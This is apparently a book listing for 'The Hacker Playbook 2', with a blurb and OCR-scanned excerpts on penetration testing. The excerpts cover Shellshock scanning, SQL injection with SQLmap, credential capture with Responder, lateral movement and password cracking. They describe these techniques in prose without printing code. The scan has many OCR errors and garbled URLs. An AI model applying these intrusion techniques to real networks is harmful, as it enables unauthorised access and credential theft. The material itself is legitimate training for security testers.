Author: Peter Kim
Pub Date: 2015
Size: 38 Mb
Just as a professional athlete doesn’t show up without a solid game plan, ethical hackers, IT professionals, and security researchers should not be unprepared, either. The Hacker Playbook provides them their own game plans. Written by a longtime security professional and CEO of Secure Planet, LLC, this step-by-step guide to the “game” of penetration hacking features hands-on examples and helpful advice from the top of the field.
Through a series of football-style “plays,” this straightforward guide gets to the root of many of the roadblocks people may face while penetration testing—including attacking different types of networks, pivoting through security controls, privilege escalation, and evading antivirus software.
From “Pregame” research to “The Drive” and “The Lateral Pass,” the practical plays listed can be read in order or referenced as needed. Either way, the valuable advice within will put you in the mindset of a penetration tester of a Fortune 500 company, regardless of your career or level of experience.
This second version of The Hacker Playbook takes all the best “plays” from the original book and incorporates the latest attacks, tools, and lessons learned. Double the content compared to its predecessor, this guide further outlines building a lab, walks through test cases for attacks, and provides more customized code.
Whether you’re downing energy drinks while desperately looking for an exploit, or preparing for an exciting new job in IT security, this guide is an essential part of any ethical hacker’s library—so there’s no reason not to get in the game.
Building Your Penetration Testing Box
In The Hacker Playhook One book, I received some comments on why I have you build and install the tools instead of creating one script to automate it all. The main reason 1 have my readers manually go through these steps is because these are extremely important tools and this will help you remember what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well-organized, but if you don’t know the tool is installed or you haven’t played around with the individual attacks, then it won’t really be helpful in that dire need situation.
Setting Up A Penetration Testing Box
If you set up your box from the first book, you can breeze over this section. As you know, I always like bringing two different laptops to an engagement. The first is a Windows box and the second is either an OS X or Linux host. The reason I bring two laptops is becaase 1 have been on penetration tests where, on very specific networks, the OS X host would not connect to the network. Instead of spending hours trying to figure out why, 1 just started all of my attacks and scanning from my Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times having two laptops has saved me.
It doesn’t matter if you rim Windows, OS X, or some Linux flavor on your base system, but there are a few masts. First, you need to install a Virtual Machine (VM) platform You can use Virtual Box or VMWare Player or any others of your choice. Both are free on Windows and only Virtual Box on OS X is free. I would highly recommend getting the commercial versions for your VM platform as they have a wealth of extra features, such as encryption, snapshots, and much better VM management.
Since we are going to install most of our tools on our VMs, the most important step is to keep your base system clean. Try not to even browse personal sites on the base image. This way, your base system is always clean and you won’t ever bring malware onto a client site (I have seen this many times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is revert back to the baseline image, patch and update tools, and add any additional tools I need. Trast me, this tactic is a lifesaver. I can’t count the number of past assessments where I spent way too much time setting up a tool that should have already been installed.
What this chapter has tried to do is to help you build a standard platform for testing, make sure you have a strong foundation of PowerShell, and give you an understanding of the basics of binary exploitation.
Tools will always change, so it is important to keep your testing platforms up-to-date and patched. 1 have included all the tools that are used in this book and, hopefully, this information will be enough to get you started. If you feel that 1 am missing any critical tools, feel free to leave comments at: www. thchackcrplaybook.com.
Take a Hill clean snapshot of your working VMs and let’s start discovering and attacking networks.
This will write a shell script to the cgi-bin folder that we need to use to execute the vulnerability. Remember for something like Shellshock to work, it needs to have a bash file in the cgi-bin folder. You can access it by going to a browser and inputting http:// [lP of vulnerable host]/cgi-bin/test.cgi. If everything worked, you should see a page that just says “hi”.
Going back to our attacking Kali host, we are going to use a tool 1 created called icmpshock.py (note that there is also a Metasploit module, so try them all). The reason I created this script is because 1 wanted the tool to brute-force through all common cgi type files at an amazing speed and test all the common HTTP header information (User Agent, Cookie, Host, Refer) with ShellShock. As long as you have a pretty big pipe, you can take advantage of Python’s threading to brute-force through all cgi files/directories in just seconds. Remember that we are going for quick and efficient to try to pop as many boxes as possible.
Web Application Penetration Testing
In the initial prep section, we have set up a couple of vulnerable VMs for testing. Since some of this section will be based off the OWASP Broken Web Application VM, I highly recommend you set it up prior to reading this chapter. You can download the VM here: sourccforgc.net/proj ects/owaspbwa/fi les/
Once you download it, you can unzip it and run it in either VMWare or VM Player. Once loaded, grab the IP of the virtual machine and open it up in your local browser. It should look something like the following:
From either the scanning results or from just poking around, you might be able to identify some SQL injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a flill compromise of the database or of the system itself. Two open source tools that I have found to work most of the time are SQLmap and Sqlninja. Let’s go through the process from identification to exploitation.
The Lateral Pass – Moving Through The Network
At this point, you have compromised some servers and services through the SUCK network, but unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t seem to move forward. You might be on a network, but without privileges or account credentials, you would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your ability to move through the network and gain access to domain administrative accounts. However, as a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where sensitive data is being stored and gain access to those environments. This might require pivoting through essential employees and understanding how the corporation segments their data.
This section will focus on moving through the network and going from a limited user, all the way to owning the whole network. We will cover such topics as starting without credentials, proxying through hosts, having limited domain credentials, and then having local/domain credentials.
On The Network Without Credentials:
Let’s say that you are on the network, but you don’t have any credentials yet. Maybe you cracked their WPAv2 Personal Wi-Fi password or popped a box that wasn’t connected to the domain. 1 might first turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other passive types attacks. Once 1 feel like I have an understanding of the local network, I will start compromising systems using a variety of attacks specified in the next few sections.
(github.com/SpidcrLabs/Rcspondcr) (Kali Linux)
One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is a tool that listens and responds to LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS over TCP/IP Name Service).
Special Teams – Cracking, Exploits, And Tricks
This section focuses on all other methods that can assist in penetration testing, but do not fit in the other sections. I will discuss some of the tips and tricks I have for cracking password hashes, searching for vulnerabilities, and some short cuts.
There are many different tools to use with password cracking, however, 1 am going to focus mainly on two tools that 1 use. These two tools are John the Ripper (JtR) and oclHashcat. These are both excellent tools for cracking passwords.
Before 1 can start talking about different password crackers, it is important to make sure you understand the basic definitions. The three configurations you should generally make for an efficient password cracking process are to define wordlists, rules, and hashing algorithms.